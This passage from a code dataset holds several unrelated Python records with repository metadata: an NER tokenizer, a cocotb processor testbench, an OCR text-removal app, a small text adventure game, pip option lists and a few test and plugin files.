import KoBertTokenizer\n\n@dataclass\nclass NerTokenizerFactories:\n    BERT_TOKENIZER: KoBertTokenizer\n\nclass NerTokenizer:\n    def __init__(self, tokenizer_name=None):\n        self.tokenizer_name = tokenizer_name\n\n        if tokenizer_name == \"BERT\":\n            self.tokenizer = KoBertTokenizer.from_pretrained(\"monologg/kobert\")\n    \n    def tokenize(self, sentence):\n        return self.tokenizer.tokenize(sentence)\n\n    def convert_tokens_to_ids(self, tokens):\n        return self.tokenizer.convert_tokens_to_ids(tokens)\n\n    def get_pad_token(self):\n        return self.tokenizer.pad_token\n\n    def get_pad_token_id(self):\n        return self.tokenizer.pad_token_id\n\n    def __call__(self, sentence, chars):\n        token_list = self.tokenize(sentence)\n        label_list = []\n\n        for token in token_list:\n            if token.startswith(\"▁\"):\n                token = token[1:]\n\n            label = \"\"\n            is_single_token = False\n            is_begin_token = False\n            is_inside_token = False\n            is_end_token = False\n\n            while token:\n                token = token[1:]\n\n                while True:\n                    char = chars[0]\n                    del chars[0]\n\n                    if char[\"char\"] != \" \":\n                        break\n\n                l = char[\"label\"]\n\n                if l != \"O\":\n                    label = l[2:]\n\n                if l.startswith(\"S-\"):\n                    is_single_token = True\n                elif l.startswith(\"B-\"):\n                    is_begin_token = True\n                elif l.startswith(\"I-\"):\n                    is_inside_token = True\n                elif l.startswith(\"E-\"):\n                    is_end_token = True\n\n            if (is_begin_token and is_end_token) or is_single_token:\n                label_list.append(\"S-\" + label)\n            elif is_end_token:\n                label_list.append(\"E-\" + label)\n            elif is_begin_token:\n                label_list.append(\"B-\" + label)\n            elif is_inside_token:\n                label_list.append(\"I-\" + label)\n            else:\n                label_list.append(\"O\")\n\n        return token_list, label_list", "repo_name": "chnaaam/korean-named-entity-recognition", "sub_path": "KoNER/tokenizer/ner_tokenizer.py", "file_name": "ner_tokenizer.py", "file_ext": "py", "file_size_in_byte": 2219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dataclasses.dataclass", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "38814242542", "text": "\"\"\"\r\nAfter identifying each researcher community, we want to find scholars who\r\nfrequently collaborate with one another; we call such a group a 'team'.\r\nUsing the number of co-authored papers between researchers as the criterion,\r\nperform frequent pattern mining to find 'teams' of three or more people.\r\n\"\"\"\r\n\r\nimport codecs\r\nfrom pyfpgrowth import find_frequent_patterns\r\nfrom utils import load_author_list\r\n\r\n\r\ndef find_team(data, freq=5, file_path='./data/author_list/team'):\r\n    \"\"\"\r\n    find teams according to the frequency threshold with the FP-growth algorithm\r\n    \"\"\"\r\n    teams = find_frequent_patterns(data, freq)\r\n    with codecs.open(file_path, 'w', encoding='utf8') as f:\r\n        for team in teams:\r\n            # team size should be at least 3\r\n            if len(team) >= 3:\r\n                f.write(','.join(team) + '\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n    data = load_author_list()\r\n    find_team(data)\r\n", "repo_name": "Sara-HY/FrequentPattern", "sub_path": "team.py", "file_name": "team.py", "file_ext": "py", "file_size_in_byte": 858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyfpgrowth.find_frequent_patterns", "line_number": 16, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.load_author_list", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "29758080644", "text": "import csv\nimport numpy as np\nfrom functools import reduce\npos = np.array([0,0])\nmovement = {\"forward\": np.array([1,0]), \"down\": np.array([0,1]), \"up\": np.array([0,-1])}\na = []\nwith open(\"2.txt\") as file:\n    reader = 
csv.reader(file, delimiter=\" \")\n    for row in reader:\n        a.append(row)\n \np1 = reduce(lambda x, y: x+y, [movement[m]*int(d) for m, d in a])\nprint(np.prod(p1))", "repo_name": "georgeoshardo/AOC_2021", "sub_path": "2.py", "file_name": "2.py", "file_ext": "py", "file_size_in_byte": 387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 5, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 8, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "71442573284", "text": "import random\nimport warnings\n\nimport cocotb\nfrom cocotb.clock import Clock\nfrom cocotb.triggers import FallingEdge\nfrom cocotb.triggers import RisingEdge\nfrom cocotb.triggers import Edge\nfrom cocotb.triggers import Timer\nfrom cocotb.binary import BinaryValue\n#from cocotb.regression import TestFactory\n\n# NOP = MOV R5, #0\n\"\"\"\nMOV R3, #0x3C      ;initial memory address for length and elements\nMOV R0, #0         ;number zero\nMOV R2, #0         ;keeps sum\nLDR R1, [R3]       ;read from memory location 0x3C, keeps number of elements\nNOP \nNOP \nL1: CMP R1, R0\n    NOP //to be removed\n    NOP //to be removed\nBEQ store\nNOP \nNOP \nNOP \nNOP \nADD R3, #4\nSUB R1, #1\nNOP \nLDR R4, [R3]\nNOP \nNOP \nADDS R2, R2, R4\nB L1\nNOP \nNOP \nNOP \nNOP \nstore: STR R2, [R3, #4]   ;R2 gives array sum \nNOP \nNOP \nNOP\nNOP\ndone: B done\n\"\"\"\n\n\"\"\"\n3C30A0E3\n0000A0E3\n0020A0E3\n001093E5\n0050A0E3\n0050A0E3\n000051E1\n0F00000A\n0050A0E3\n0050A0E3\n0050A0E3\n0050A0E3\n043083E2\n011041E2\n0050A0E3\n004093E5\n0050A0E3\n0050A0E3\n042092E0\nF1FFFFEA\n0050A0E3\n0050A0E3\n0050A0E3\n0050A0E3\n042083E5\n0050A0E3\n0050A0E3\nFEFFFFEA\n\"\"\"\n\n\n\n@cocotb.test()\nasync def arrays_sum_test(dut):\n    #start the clock\n    await cocotb.start(Clock(dut.clk, 10, 'us').start(start_high=False))\n    #set clkedge as the RisingEdge for triggers\n    clkedge = RisingEdge(dut.clk)\n    negclkedge = FallingEdge(dut.clk)\n    await clkedge\n    # reset PC and RegFile\n    dut.rst.value = 1\n    await clkedge\n    await clkedge\n    dut.rst.value = 0\n    assert dut.PC_out.value == 0\n    assert dut.Inst.value == 0\n    #await clkedge\n    # starts operation #######################################################\n    await clkedge\n    # fetch MOV R3, #0x3C\n    #assert dut.Inst.value == 0\n    assert dut.PC_out.value == 0\n    await clkedge\n    # decode MOV R3, #0x3C, fetch MOV R0, #0 \n    print(\"dut.Inst.value\",hex(dut.Inst.value))\n    assert dut.PC_out.value == 4\n    await clkedge\n    # Execute MOV R3, #0x3C, decode MOV R0, #0, fetch MOV R2, #0\n    print(\"dut.Inst.value\",hex(dut.Inst.value))\n    await clkedge\n    # memory MOV R3, #0x3C, execute MOV R0, #0, decode MOV R2, #0, fetch LDR R1, [R3]\n    await clkedge\n    # writeback MOV R3, #0x3C, memory MOV R0, #0, execute MOV R2, #0, decode LDR R1, [R3], fetch NOP\n    assert dut.ALUOutW.value == 0x3C\n    assert dut.REGWr.value == 1 \n    r3 = 0x3c\n    await clkedge\n    # writeback MOV R0, #0, memory MOV R2, #0, execute LDR R1, [R3], decode NOP, fetch NOP\n    assert dut.ALUOutW.value == 0\n    assert dut.REGWr.value == 1 \n    assert dut.RD1.value == 0x3C\n    print(\"Random check flags \", dut.Flags.value)\n    r0 = 0\n    \"\"\"\n    await clkedge\n    # writeback MOV R2, #0, memory LDR R1, [R3], execute NOP, decode NOP, fetch CMP R1, R0\n    assert dut.ALUOutW.value == 0\n    assert dut.REGWr.value == 1 \n    await clkedge\n    # 
writeback LDR R1, [R3], memory NOP, execute NOP, decode CMP R1, R0, fetch NOP\n    assert dut.REGWr.value == 1\n    r1 = 3\n    assert dut.ALUOutW.value == 0x3c\n    assert dut.ReadDataW.value == r1\n    \"\"\"\n    r1 = 3\n    r2 = 0\n    \n    \n    for i in range(r1):\n        print(\"Cycle \", i)\n        await clkedge\n        print(\"dut.Inst.value\",hex(dut.Inst.value))\n        # fetch CMP R1, R0\n        await clkedge\n        print(\"0xE1510000 dut.Inst.value\",hex(dut.Inst.value))\n        # decode CMP R1, R0, fetch BEQ store\n        print(\"before execute cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n        await clkedge\n        # execute CMP R1, R0, decode BEQ store, fetch NOP\n        print(\"before execute cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n        print(\"dut.PC_out.value\", int(dut.PC_out.value))\n        print(\"0x0A00000F dut.Inst.value\",hex(dut.Inst.value))\n        assert dut.RD1.value == r1\n        assert dut.RD2.value == r0\n        assert dut.FlagWriteE.value == 0b11\n        print(\"before EQ cond determined from given flags \", dut.Flags.value)\n        await clkedge\n        # memory CMP R1, R0, execute BEQ store, decode NOP, fetch NOP\n        print(\"after execute cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n        print(\"dut.Inst.value\",hex(dut.Inst.value))\n        print(\"before before writeback cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n        assert dut.FlagWriteE.value == 0\n        assert dut.CondE.value == 0 # EQ\n        print(\"EQ cond determined from given condex \", dut.condEx.value)\n        print(\"EQ cond determined from given flags \", dut.Flags.value)\n        print(\"EQ cond determined from given flags write\", dut.FlagWrite.value)\n        print(\"EQ condition\", dut.CondE.value)\n        await clkedge\n        # writeback CMP R1, R0, memory BEQ store, execute NOP, decode NOP, fetch NOP\n        print(\"after EQ cond determined from given flags \", dut.Flags.value)\n        print(\"after EQ condition\", dut.CondE.value)\n        print(\"EQ cond determined from given condex \", dut.condEx.value)\n        print(\"before writeback cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n        print(\"before before writeback dut.PC_out.value\", int(dut.PC_out.value))\n        assert dut.ALUOutW.value == r1 - r0\n        assert dut.PCSrcM.value == 0\n        await clkedge\n        # writeback BEQ store, memory NOP, execute NOP, decode NOP, fetch NOP\n        print(\"after writeback cmp dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n        print(\"before writeback dut.PC_out.value\", int(dut.PC_out.value))\n        print(\"dut.Inst.value\",hex(dut.Inst.value))\n        print(\"dut.ALUFlags_w.value\",dut.ALUFlags_w.value)\n        await clkedge\n        \"\"\"\n        # writeback NOP, memory BEQ store, execute NOP, decode NOP, fetch NOP\n        assert dut.PCSrcM.value == 0\n        print(\"dut.Inst.value\",hex(dut.Inst.value))\n        print(\"before before writeback dut.PC_out.value\", int(dut.PC_out.value))\n        await clkedge\n        # writeback BEQ store, memory NOP, execute NOP, decode NOP, fetch NOP\n        print(\"dut.Inst.value\",hex(dut.Inst.value))\n        print(\"before writeback dut.PC_out.value\", int(dut.PC_out.value))\n        print(\"dut.ALUOutW.value\", int(dut.ALUOutW.value))\n        \n        assert dut.ALUOutW.value == 15*4\n        await clkedge\n        \"\"\"\n        # fetch ADD R3, #4, writeback NOP, memory NOP, execute NOP, decode NOP\n        print(\"after branch dut.PC_out.value\", int(dut.PC_out.value))\n        print(\"dut.Inst.value\",hex(dut.Inst.value)) # instructions correct up to this point\n        await clkedge\n        # decode ADD R3, #4, memory NOP, execute NOP, fetch SUB R1, #1\n        print(\"0xE2833004 dut.Inst.value\",hex(dut.Inst.value))\n        print(\"dut.PC_out.value\", int(dut.PC_out.value))\n        await clkedge\n        # execute ADD R3, #4, writeback NOP, memory NOP, decode SUB R1, #1, fetch NOP\n        print(\"0xE2411001 
dut.Inst.value\",hex(dut.Inst.value))\n assert dut.RD1.value == r3\n await clkedge\n # memory ADD R3, #4, writeback NOP, execute SUB R1, #1, decode NOP, fetch LDR R4, [R3]\n print(\"dut.Inst.value\",hex(dut.Inst.value))\n assert dut.RD1.value == r1\n await clkedge\n # writeback ADD R3, #4, memory SUB R1, #1, execute NOP, decode LDR R4, [R3], fetch NOP\n print(\"0xE5934000 dut.Inst.value\",hex(dut.Inst.value))\n assert dut.ALUOutW.value == r3 + 4\n r3 = r3 + 4\n await clkedge\n # writeback SUB R1, #1, memory NOP, execute LDR R4, [R3], decode NOP, fetch NOP\n assert dut.ALUOutW.value == r1 - 1\n r1 = r1 - 1\n assert dut.RD1.value == r3\n await clkedge\n # writeback NOP, memory LDR R4, [R3], execute NOP, decode NOP, fetch ADDS R2, R2, R4\n await clkedge\n # writeback LDR R4, [R3], memory NOP, execute NOP, decode ADDS R2, R2, R4, fetch B L1\n if i == 0:\n r4 = 4\n elif i == 1:\n r4 = 1\n else:\n r4 = 2\n \n assert dut.ReadDataW.value == r4\n assert dut.ALUOutW.value == r3\n await clkedge\n # writeback NOP, memory NOP, execute ADDS R2, R2, R4, decode B L1, fetch NOP\n assert dut.RD1.value == r2 \n assert dut.RD2.value == r4 \n await clkedge\n # Writeback NOP, memory ADDS R2, R2, R4, execute B L1, decode NOP, fetch NOP\n await clkedge\n # writeback ADDS R2, R2, R4, memory B L1, execute NOP, decode NOP, fetch nop \n r2 = r2 + r4 \n assert dut.ALUOutW.value == r2\n await clkedge\n # writeback B L1, memory NOP, execute NOP, decode nop, fetch NOP\n \n print(\"traverse completed***********************\")\n await clkedge\n # fetch CMP R1, R0\n await clkedge\n # decode CMP R1, R0, fetch BEQ store\n await clkedge\n # execute CMP R1, R0, decode BEQ store, fetch NOP\n assert dut.RD1.value == r1\n assert dut.RD2.value == r0\n assert dut.FlagWriteE.value == 0b11\n await clkedge\n # memory CMP R1, R0, execute BEQ store, decode NOP, fetch NOP\n assert dut.FlagWriteE.value == 0\n assert dut.CondE.value == 0b0000 # EQ\n await clkedge\n # writeback CMP R1, R0, memory BEQ store, execute NOP, decode NOP, fetch NOP\n assert dut.ALUOutW.value == r1 - r0\n assert dut.PCSrcM.value == 1\n await clkedge\n # writeback BEQ store, memory NOP, execute NOP, decode NOP, fetch NOP\n await clkedge\n # writeback NOP, memory NOP, execute NOP, decode NOP, fetch STR R2, [R3, #4]\n print(\"after branch dut.PC_out.value\", int(dut.PC_out.value))\n await clkedge\n # writeback NOP, memory NOP, execute NOP, decode STR R2, [R3, #4], fetch NOP\n await clkedge\n # writeback NOP, memory NOP, execute STR R2, [R3, #4], decode NOP, fetch NOP\n assert dut.RD1.value == r3\n assert dut.RD2.value == r2 # desired result\n await clkedge\n \n \n \n", "repo_name": "htmos6/Pipelined-Processor-With-Branch-Predictor", "sub_path": "tests/tests/array_sum_test/array_sum_test.py", "file_name": "array_sum_test.py", "file_ext": "py", "file_size_in_byte": 9791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cocotb.start", "line_number": 85, "usage_type": "call"}, {"api_name": "cocotb.clock.Clock", "line_number": 85, "usage_type": "call"}, {"api_name": "cocotb.triggers.RisingEdge", "line_number": 87, "usage_type": "call"}, {"api_name": "cocotb.triggers.FallingEdge", "line_number": 88, "usage_type": "call"}, {"api_name": "cocotb.test", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "40429805431", "text": "\"\"\"\nThis app takes a base-64 encoded image as input and returns \na modified image with all text removed. \n\nThe app is deployed as a Beam TaskQueue. 
You can retrieve modified images through\nthe /task endpoint. \n\"\"\"\nfrom beam import App, Runtime, Image, Output\n\nimport base64\nimport keras_ocr\nimport cv2\nimport math\nimport numpy as np\n\napp = App(\n name=\"rmtext\",\n runtime=Runtime(\n cpu=4,\n memory=\"16Gi\",\n image=Image(\n python_packages=[\n \"numpy\",\n \"matplotlib\",\n \"opencv-python\",\n \"keras_ocr\",\n \"tensorflow\",\n ],\n commands=[\"apt-get update && apt-get install -y libgl1\"],\n ),\n ),\n)\n\n\ndef midpoint(x1, y1, x2, y2):\n x_mid = int((x1 + x2) / 2)\n y_mid = int((y1 + y2) / 2)\n return (x_mid, y_mid)\n\n\n# Deploys app as a task queue, with a base64-encoded image as input\n@app.task_queue(\n outputs=[\n # Path to save generated images to\n Output(path=\"output.png\")\n ]\n)\ndef remove_text(**inputs):\n # Grab the base64 from the kwargs\n encoded_image = inputs[\"image\"]\n # Convert the base64-encoded input image to a buffer\n image_buffer = base64.b64decode(encoded_image)\n\n pipeline = keras_ocr.pipeline.Pipeline()\n\n # Read the image\n img = keras_ocr.tools.read(image_buffer)\n # Generate (word, box) tuples\n prediction_groups = pipeline.recognize([img])\n mask = np.zeros(img.shape[:2], dtype=\"uint8\")\n for box in prediction_groups[0]:\n x0, y0 = box[1][0]\n x1, y1 = box[1][1]\n x2, y2 = box[1][2]\n x3, y3 = box[1][3]\n\n x_mid0, y_mid0 = midpoint(x1, y1, x2, y2)\n x_mid1, y_mi1 = midpoint(x0, y0, x3, y3)\n\n thickness = int(math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2))\n\n cv2.line(mask, (x_mid0, y_mid0), (x_mid1, y_mi1), 255, thickness)\n img = cv2.inpaint(img, mask, 7, cv2.INPAINT_NS)\n\n img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # Save the generated image to the Beam Output path\n cv2.imwrite(\"output.png\", img_rgb)\n\n\nif __name__ == \"__main__\":\n input_image = \"./coffee.jpeg\"\n with open(input_image, \"rb\") as image_file:\n encoded_image = base64.b64encode(image_file.read())\n remove_text(image=encoded_image)\n", "repo_name": "slai-labs/get-beam", "sub_path": "examples/remove-text/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2291, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 64, "dataset": "github-code", "pt": "52", "api": [{"api_name": "beam.App", "line_number": 16, "usage_type": "call"}, {"api_name": "beam.Runtime", "line_number": 18, "usage_type": "call"}, {"api_name": "beam.Image", "line_number": 21, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 52, "usage_type": "call"}, {"api_name": "keras_ocr.pipeline.Pipeline", "line_number": 54, "usage_type": "call"}, {"api_name": "keras_ocr.pipeline", "line_number": 54, "usage_type": "attribute"}, {"api_name": "keras_ocr.tools.read", "line_number": 57, "usage_type": "call"}, {"api_name": "keras_ocr.tools", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.inpaint", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.INPAINT_NS", "line_number": 73, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 77, "usage_type": "call"}, {"api_name": "beam.Output", "line_number": 45, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 83, "usage_type": "call"}]} 
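Isolating the masking trick from the record above: for each detected word box, a line is drawn between the midpoints of the box's two short sides, as thick as the box is tall, and that masked region is inpainted away. A self-contained sketch; the image and box coordinates are fabricated for illustration:

```python
import numpy as np
import cv2

# Self-contained sketch of the mask-and-inpaint step used above;
# the blank image and box corners are made up for illustration.
img = np.full((60, 160, 3), 200, dtype=np.uint8)
(x0, y0), (x1, y1), (x2, y2), (x3, y3) = [(20, 20), (140, 20), (140, 40), (20, 40)]

mid_right = ((x1 + x2) // 2, (y1 + y2) // 2)
mid_left = ((x0 + x3) // 2, (y0 + y3) // 2)
thickness = int(np.hypot(x2 - x1, y2 - y1))  # box height becomes the line width

mask = np.zeros(img.shape[:2], dtype="uint8")
cv2.line(mask, mid_right, mid_left, 255, thickness)
cleaned = cv2.inpaint(img, mask, 7, cv2.INPAINT_NS)
print(cleaned.shape)  # (60, 160, 3)
```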
+{"seq_id": "43313816383", "text": "import random\nimport json\nimport os\n\n\ncheck = \"\"\nsave = \"\"\nscore = 0\n\n\n# user defined function\nwith open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/highscore.json\", \"r\") as file:\n highscore = file.read()\n highscore = json.loads(highscore)\n\n\ndef checkScore():\n for x in range(1, 11):\n if score > highscore[str(x)][\"score\"]:\n return x\n return False\n\n\ndef checking():\n check = checkScore()\n if check != False:\n updateHighscore(check)\n\n\ndef fun_intro()->bool:\n global name\n print('Welcome to THE GAME, this is a text based adventure game, where YOU are the one who makes the decisions. The objective of this game is to find out what happened to all of your stuff.')\n name = input('What is your name? : ') \n age = input(\"What is your age : \")\n if int(age) >= 13:\n print(\"You can play the game\")\n factuurtekst = \"Hello \" + str(name) + \", your choices have a huge impact on the game so be smart, enjoy. (when something is between '' please type that as your answer.)\" \n print(factuurtekst)\n doorgaan = True\n else:\n print(\"Stop going on the internet.\")\n doorgaan = False\n return doorgaan\n \n\ndef fun_op(vraagNmr, vraag, progAntwoord):\n autosave(vraagNmr)\n print(vraag)\n global score\n opt1 = input(\" {\").lower()\n if opt1 == \"a\":\n print(progAntwoord)\n delete()\n checking()\n exit()\n elif opt1 == \"b\":\n score += 1\n if score == 6:\n checking()\n\ndef autosave(flag):\n flag = json.dumps(flag)\n with open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/autosave.json\", \"w\") as save:\n save.write(flag)\n\n \ndef updateHighscore(rank):\n global highscore\n z = 10 - rank\n s = 10\n for x in range(z):\n d = s - 1\n highscore[str(s)] = {'name': highscore[str(d)][\"name\"], 'score': highscore[str(d)][\"score\"]}\n s -= 1\n highscore[str(rank)] = {'name': str(name), 'score': score}\n with open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/highscore.json\", \"w\") as file:\n save = json.dumps(highscore, indent= 2)\n file.writelines(save)\n \n\n#autosave\ndef saveCheck():\n path = os.path.dirname(os.path.abspath(__file__))\n return os.path.exists(path + \"/autosave.json\")\n\n \n# json \n\ndef delete():\n os.remove(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/autosave.json\")\n\n\nwith open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/vraagnmr.json\", \"r\") as vragenJSON:\n vragenDict = json.load(vragenJSON)\n\n\nif saveCheck() == True:\n print(\"Do you want to continue your last story, type Y or N\" )\n check = input(\"{\").lower()\n if check == \"y\":\n with open(\"C:/Users/larsk/OneDrive/Documenten/Projecten/file-remember/autosave.json\", \"r\") as file:\n save1 = file.read()\n save1 = json.loads(save1)\n if check == \"n\":\n delete() \n\n \nif check == \"y\":\n for x in range(save1, len(vragenDict)+1):\n fun_op(x, vragenDict[str(x)][\"vraag\"], vragenDict[str(x)][\"progAntwoord\"])\n delete()\n\n\nelif fun_intro():\n for (k,v) in vragenDict.items():\n fun_op(int(k), vragenDict[k][\"vraag\"], vragenDict[k][\"progAntwoord\"])\n delete()\n\n", "repo_name": "LarsKalishoek/file-remember", "sub_path": "the_game.py", "file_name": "the_game.py", "file_ext": "py", "file_size_in_byte": 3279, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}, 
{"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 90, "usage_type": "call"}, {"api_name": "json.load", "line_number": 94, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "40850521607", "text": "r\"\"\"Option\n==========\n\"\"\"\nfrom pip._internal.commands import create_command\n\n# https://pip.pypa.io/en/stable/reference/requirements-file-format/#supported-options\nWHITELIST = [\n \"-i\",\n \"--index-url\",\n \"--extra-index-url\",\n \"--no-index\",\n \"-c\",\n \"--constraint\",\n \"-r\",\n \"--requirement\",\n \"-e\",\n \"--editable\",\n \"-f\",\n \"--find-links\",\n \"--no-binary\",\n \"--only-binary\",\n \"--prefer-binary\",\n \"--require-hashes\",\n \"--pre\",\n \"--trusted-host\",\n \"--use-feature\",\n \"--global-option\",\n \"--config-settings\",\n \"--hash\",\n]\n\nOPTIONS_WITH_EQUAL = {\n opt\n + (\"=\" if option.nargs and opt in option._long_opts else \"\"): option.help\n if option.help\n else \"\"\n for option in create_command(\"install\").parser.option_list_all\n if (option._short_opts + option._long_opts)[0] in WHITELIST\n for opt in option._short_opts + option._long_opts\n}\n\nOPTIONS = {opt.rstrip(\"=\"): doc for opt, doc in OPTIONS_WITH_EQUAL.items()}\n", "repo_name": "Freed-Wu/requirements-language-server", "sub_path": "src/requirements_language_server/misc/option.py", "file_name": "option.py", "file_ext": "py", "file_size_in_byte": 980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pip._internal.commands.create_command", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "36055531955", "text": "import os\nimport pathlib\n\nfrom neighborly.simulation import Neighborly, PluginInfo\nfrom neighborly.tracery import load_names\n\n_RESOURCES_DIR = pathlib.Path(os.path.abspath(__file__)).parent / \"data\"\n\nplugin_info = PluginInfo(\n name=\"default names plugin\",\n plugin_id=\"default.names\",\n version=\"0.1.0\",\n)\n\n\ndef setup(sim: Neighborly):\n load_names(\n sim.world,\n rule_name=\"character::last_name\",\n file_path=_RESOURCES_DIR / \"names\" / \"surnames.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"character::first_name::NonBinary\",\n file_path=_RESOURCES_DIR / \"names\" / \"neutral_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"character::first_name::Female\",\n file_path=_RESOURCES_DIR / \"names\" / \"feminine_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"character::first_name::Male\",\n file_path=_RESOURCES_DIR / \"names\" / \"masculine_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"restaurant_name\",\n file_path=_RESOURCES_DIR / \"names\" / \"restaurant_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"bar_name\",\n file_path=_RESOURCES_DIR / \"names\" / \"bar_names.txt\",\n )\n\n load_names(\n sim.world,\n rule_name=\"settlement_name\",\n file_path=_RESOURCES_DIR / \"names\" / \"US_settlement_names.txt\",\n )\n", "repo_name": "ShiJbey/neighborly", "sub_path": "src/neighborly/plugins/defaults/names.py", "file_name": "names.py", "file_ext": 
"py", "file_size_in_byte": 1401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 34, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "neighborly.simulation.PluginInfo", "line_number": 9, "usage_type": "call"}, {"api_name": "neighborly.simulation.Neighborly", "line_number": 16, "usage_type": "name"}, {"api_name": "neighborly.tracery.load_names", "line_number": 17, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 23, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 29, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 35, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 41, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 47, "usage_type": "call"}, {"api_name": "neighborly.tracery.load_names", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "35616093649", "text": "from aiohttp.test_utils import make_mocked_coro\n\nfrom virtool.tasks.progress import (\n AccumulatingProgressHandlerWrapper,\n TaskProgressHandler,\n)\n\n\nasync def test_accumulating_handler():\n set_progress = make_mocked_coro()\n set_error = make_mocked_coro()\n\n handler = TaskProgressHandler(set_error, set_progress)\n tracker = AccumulatingProgressHandlerWrapper(handler, 24)\n\n await tracker.add(3)\n\n # Expect rounded 3 / 24 * 100.\n set_progress.assert_called_with(\n 12,\n )\n\n await tracker.add(3)\n\n # Expect rounded 8 / 24 * 100.\n set_progress.assert_called_with(\n 25,\n )\n\n await tracker.add(18)\n\n set_progress.assert_called_with(\n 100,\n )\n", "repo_name": "virtool/virtool", "sub_path": "tests/tasks/test_progress.py", "file_name": "test_progress.py", "file_ext": "py", "file_size_in_byte": 707, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "52", "api": [{"api_name": "aiohttp.test_utils.make_mocked_coro", "line_number": 10, "usage_type": "call"}, {"api_name": "aiohttp.test_utils.make_mocked_coro", "line_number": 11, "usage_type": "call"}, {"api_name": "virtool.tasks.progress.TaskProgressHandler", "line_number": 13, "usage_type": "call"}, {"api_name": "virtool.tasks.progress.AccumulatingProgressHandlerWrapper", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "27332633902", "text": "from OrganoTrack.Detecting import SegmentWithOrganoSegPy\nfrom OrganoTrack.Importing import ReadImages\nfrom OrganoTrack.Displaying import ExportImageWithContours, Display, DisplayImages\nfrom OrganoTrack.Filtering import FilterByFeature, RemoveBoundaryObjects\nfrom OrganoTrack.Measuring import CalculateRoundness\n\nfrom pathlib import Path\nimport cv2 as cv\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport skimage\nfrom skimage import measure, filters, morphology\nimport plotly\nimport plotly.express as px\nimport plotly.graph_objects as go\n\ndef Label(image):\n labeled = skimage.measure.label(image)\n return labeled\n\n\ndef CreatePropertyDF(labelledImage, property):\n dfSize = (np.max(labelledImage) + 1, 1)\n propertyDF = pd.DataFrame(np.ndarray(dfSize, dtype=str))\n\n 